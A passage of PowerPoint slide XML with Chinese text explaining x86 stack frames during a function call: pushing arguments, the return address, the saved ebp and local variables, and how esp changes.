                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>随之指向相邻的下一条指令，如此反复，程序就得以连续执行指令。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>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下面让我们来看看发生函数调用时，栈顶函数状态以及上述寄存器的变化。变化的核心任务是将调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的状态保存起来，同时创建被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的状态。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>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首先将被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的参数按照逆序依次压入栈内。如果被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）不需要参数，则没有这一步骤。这些参数仍会保存在调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的函数状态内，之后压入栈内的数据都会作为被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的函数状态来保存。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7565B4F1-8D77-4EDE-9195-2A3CC162D1AC}"/>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7289442" y="1311499"/>
            <a:ext cx="4677428" cy="3865670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6684A278-462C-4A95-93A8-FE7EA214BAF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8035412" y="5177169"/>
            <a:ext cx="3185487"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rPr>
              <a:t>将被调用函数的参数压入栈内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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237E7BE6-FDFF-4CDA-AABD-AE2CEA8F9959}"/>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19923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3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01F21D3C-9F5D-47B3-93F0-1EF18E038016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431912" y="2828834"/>
            <a:ext cx="6096000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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然后将调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）进行调用之后的下一条指令地址作为返回地址压入栈内。这样调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（指令）信息得以保存。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA4BF80-115D-40CD-B3D9-35F214B5A4B7}"/>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7337089" y="1333207"/>
            <a:ext cx="4648849" cy="4191585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB173F8-13F3-4815-A6EF-9419AF434AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7837937" y="5524792"/>
            <a:ext cx="3647152"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rPr>
              <a:t>将被调用函数的返回地址压入栈内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>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DE544343-CD9E-41EC-9759-A05A653B8DC1}"/>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68375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 name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C49A3C1-9D59-4E76-8C59-9E4B374B3FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="2677251"/>
            <a:ext cx="6096000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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再将当前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器的值（也就是调用函数的基地址）压入栈内，并将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器的值更新为当前栈顶的地址。这样调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（基地址）信息得以保存。同时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>被更新为被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的基地址。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAAA5965-1568-4BF2-9444-D655D6C49FB5}"/>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7173531" y="853673"/>
            <a:ext cx="4654401" cy="4676425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ACD245E-A344-49AC-AB07-0D84C105C4CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7173530" y="5530098"/>
            <a:ext cx="4654401" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>将调用函数的基地址（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）压入栈内，并将当前栈顶地址传到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>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B450286E-2AE4-471C-AC49-AAEF6B5C30B6}"/>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501411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 name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E30619AA-F164-4FAE-819F-8D4F084C049C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431912" y="2880377"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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再之后是将被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的局部变量等数据压入栈内。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1EABE21-65EC-489F-B225-E707B2631F45}"/>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7621665" y="763450"/>
            <a:ext cx="4280091" cy="4880186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ABBEAF0-EE77-4681-97E4-B7A8BE94D710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7938134" y="5709043"/>
            <a:ext cx="3647152"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rPr>
              <a:t>将被调用函数的局部变量压入栈内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>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86438E6D-AB74-45E4-925F-492337B72CEC}"/>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23313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 name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01288C6B-31B6-4828-815F-3758AE90730A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523741" y="1746391"/>
            <a:ext cx="6096000" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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在压栈的过程中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>esp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器的值不断减小（对应于栈从内存高地址向低地址生长）。压入栈内的数据包括调用参数、返回地址、调用函数的基地址，以及局部变量，其中调用参数以外的数据共同构成了被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的状态。在发生调用时，程序还会将被调用函数（</a:t>
            </a:r>
            <a:r>
